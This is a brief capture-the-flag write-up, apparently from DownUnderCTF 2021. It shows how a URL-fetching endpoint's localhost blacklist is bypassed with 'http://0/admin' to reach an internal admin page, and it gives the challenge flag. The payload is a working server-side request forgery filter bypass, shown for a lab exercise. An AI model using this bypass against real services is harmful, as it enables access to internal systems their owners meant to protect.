Main page:

Source code reveals /admin and an endpoint that can be abused

/request?url=http://localhost/admin says it's blacklisted

So I bypassed it using the link below:

https://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=http://0/admin

DUCTF{very_spooky_request}